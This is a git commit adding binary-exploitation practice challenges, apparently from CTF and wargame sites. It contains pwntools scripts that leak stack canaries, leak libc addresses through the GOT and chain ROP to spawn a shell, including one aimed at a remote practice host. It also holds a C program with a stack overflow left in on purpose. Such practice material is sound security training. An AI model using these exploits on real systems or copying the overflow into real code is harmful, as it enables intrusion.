Renamed

2022-01-19 20:45:17 +08:00
parent 3a0e685f4d
commit 766d017e6e
41 changed files with 0 additions and 0 deletions
--- a/Canary/djCTF-1/answer.py
+++ b/Canary/djCTF-1/answer.py
@@ -0,0 +1,24 @@
+#!/usr/bin/env python2
+from pwn import *
+from LibcSearcher import *
+from struct import pack
+import os, base64, time
+context(arch = "amd64",os = "linux", log_level = "debug")
+
+p = process('./djctf1')
+elf = ELF('./djctf1')
+#gdb.attach(p, "b pwnable\n b flag")
+
+# Canary Leak
+p.recvuntil("> ")
+p.sendline('0' * 0x18)
+p.recvuntil('0' * 0x18)
+canary_value = u64(p.recv(8)) - 0x0a
+print("Canary: " + hex(canary_value))
+
+# hijack control flow
+p.recvuntil("> ")
+#p.sendline('0' * 0x18 + p64(canary_value) + p64(0) + '\x00')
+p.sendline('0' * 0x18 + p64(canary_value) + p64(0))
+#time.sleep(10)
+p.interactive()
--- a/Canary/djCTF-1/compile.sh
+++ b/Canary/djCTF-1/compile.sh
@@ -0,0 +1,2 @@
+#!/bin/sh
+gcc djctf1.c -g -o djctf1
--- a/Canary/djCTF-1/djctf1
+++ b/Canary/djCTF-1/djctf1
--- a/Canary/djCTF-1/djctf1.c
+++ b/Canary/djCTF-1/djctf1.c
@@ -0,0 +1,41 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+void pwnable();
+void init();
+__attribute__((aligned(0x100)))
+void flag(){
+    asm volatile(".byte 0x90");
+    asm volatile(".byte 0x90");
+    asm volatile(".byte 0x90");
+    asm volatile(".byte 0x90");
+    asm volatile(".byte 0x90");
+    asm volatile(".byte 0x90");
+    asm volatile(".byte 0x90");
+    asm volatile(".byte 0x90");
+    asm volatile(".byte 0x90");
+    asm volatile(".byte 0x90");
+    system("cat flag");
+    write(1, "Unbelieveable! You must be an experienced hacker!!\n", 51);
+    write(1, "That's your reward!!", 20);
+}
+int main(){
+    init();
+    write(1, "You are so lucky to have unlimited chance!!! xm!!!\n", 51);
+    while(1){
+        pwnable();
+    }
+}
+void init(){
+    setvbuf(stdout, 0LL, 2, 0LL);
+    setvbuf(stdin, 0LL, 2, 0LL);
+    setvbuf(stderr, 0LL, 2, 0LL);
+}
+void pwnable(){
+    char buf[0x10];
+    write(1, "> ", 2);
+    read(0, buf, 0x29);
+    write(1, "Let's check if you are successful. \n", 36);
+    puts(buf);
+    buf[0x18] = 0x00;
+}
--- a/Canary/pwn100/answer.py
+++ b/Canary/pwn100/answer.py
@@ -0,0 +1,52 @@
+#!/usr/bin/env python2
+from pwn import *
+from LibcSearcher import *
+from struct import pack
+import os, base64
+context(arch = "i386",os = "linux", log_level = "debug")
+
+p = process('./pwns')
+elf = ELF('./pwns')
+
+# Canary Leak
+p.recvuntil("May be I can know if you give me some data[Y/N]\n")
+confirm = "Y"
+p.sendline(confirm)
+p.recvuntil("Give me some datas:\n\n")
+
+canary_payload = 257*'0' + '0'
+canary_payload = base64.b64encode(canary_payload)
+p.sendline(canary_payload)
+p.recv(0x10b)
+canary_value = u32(p.recv(4)) - 0x30
+print("Canary: " + hex(canary_value))
+
+# puts .got address leak
+p.recvuntil("May be I can know if you give me some data[Y/N]\n")
+p.sendline(confirm)
+p.recvuntil("Give me some datas:\n\n")
+
+puts_plt = elf.plt['puts']
+puts_got = elf.got['puts']
+b64decode_func = 0x080487e6
+puts_leak_payload = 257*'\x00' + p32(canary_value) + 8*'0' + p32(0) + p32(puts_plt) + p32(b64decode_func) + p32(puts_got)
+puts_leak_payload = base64.b64encode(puts_leak_payload)
+p.sendline(puts_leak_payload)
+
+p.recvuntil("Result is:\n")
+puts_libc = u32(p.recv(4))
+
+# Query LibcSearcher
+libc = LibcSearcher('puts', puts_libc)
+libc_base = puts_libc - libc.dump('puts')
+system_libc = libc_base + libc.dump('system')
+binsh_libc = libc_base + libc.dump('str_bin_sh')
+
+# ROP to Shell
+retn_addr = 0x08048c27
+p.recvuntil("Give me some datas:\n\n")
+shell_payload = 257*'\x00' + p32(canary_value) + 8*'0' + p32(0) + p32(system_libc) + p32(b64decode_func) + p32(binsh_libc)
+shell_payload = base64.b64encode(shell_payload)
+p.sendline(shell_payload)
+
+p.interactive()
--- a/Canary/pwn100/pwns
+++ b/Canary/pwn100/pwns
--- a/Canary/pwn100/test.py
+++ b/Canary/pwn100/test.py
@@ -0,0 +1,29 @@
+#!/usr/bin/env python2
+from pwn import *
+from LibcSearcher import *
+from struct import pack
+import os, base64
+context(arch = "i386",os = "linux", log_level = "debug")
+
+
+p = process('./pwns')
+elf = ELF('./pwns')
+
+p.recvuntil("May be I can know if you give me some data[Y/N]")
+confirm = "Y"
+p.sendline(confirm)
+
+test_payload = ""
+for i in range(256):
+    test_payload += chr(i)
+for i in range(256):
+    test_payload += chr(i)
+test_payload = base64.b64encode(test_payload)
+
+p.sendline(test_payload)
+
+with open("test.txt", "w") as f:
+    f.write(confirm + "\n")
+    f.write(test_payload + "\n")
+
+p.interactive()
--- a/Canary/pwn100/test.txt
+++ b/Canary/pwn100/test.txt
@@ -0,0 +1,2 @@
+Y
+AAECAwQFBgcICQoLDA0ODxAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc4OTo7PD0+P0BBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWltcXV5fYGFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6e3x9fn+AgYKDhIWGh4iJiouMjY6PkJGSk5SVlpeYmZqbnJ2en6ChoqOkpaanqKmqq6ytrq+wsbKztLW2t7i5uru8vb6/wMHCw8TFxsfIycrLzM3Oz9DR0tPU1dbX2Nna29zd3t/g4eLj5OXm5+jp6uvs7e7v8PHy8/T19vf4+fr7/P3+/wABAgMEBQYHCAkKCwwNDg8QERITFBUWFxgZGhscHR4fICEiIyQlJicoKSorLC0uLzAxMjM0NTY3ODk6Ozw9Pj9AQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpbXF1eX2BhYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ent8fX5/gIGCg4SFhoeIiYqLjI2Oj5CRkpOUlZaXmJmam5ydnp+goaKjpKWmp6ipqqusra6vsLGys7S1tre4ubq7vL2+v8DBwsPExcbHyMnKy8zNzs/Q0dLT1NXW19jZ2tvc3d7f4OHi4+Tl5ufo6err7O3u7/Dx8vP09fb3+Pn6+/z9/v8=
--- a/Canary/smash-the-stack/answer.py
+++ b/Canary/smash-the-stack/answer.py
@@ -0,0 +1,17 @@
+#!/usr/bin/env python2
+from pwn import *
+from LibcSearcher import *
+from struct import pack
+import os
+context(arch = "i386",os = "linux", log_level = "debug")
+
+p = remote("hackme.inndy.tw", 7717)
+#p = process('./smash-the-stack')
+elf = ELF('./smash-the-stack')
+
+buff_bss = elf.sym['buff']
+
+payload = 0xbc*'a' + p32(buff_bss)
+p.sendline(payload)
+
+p.interactive()
--- a/Canary/smash-the-stack/flag
+++ b/Canary/smash-the-stack/flag
@@ -0,0 +1 @@
+flag{this-is-a-test-flag-this-is-a-test-flag}
--- a/Canary/smash-the-stack/smash-the-stack
+++ b/Canary/smash-the-stack/smash-the-stack
				`@@ -0,0 +1 @@`
				`flag{this-is-a-test-flag-this-is-a-test-flag}`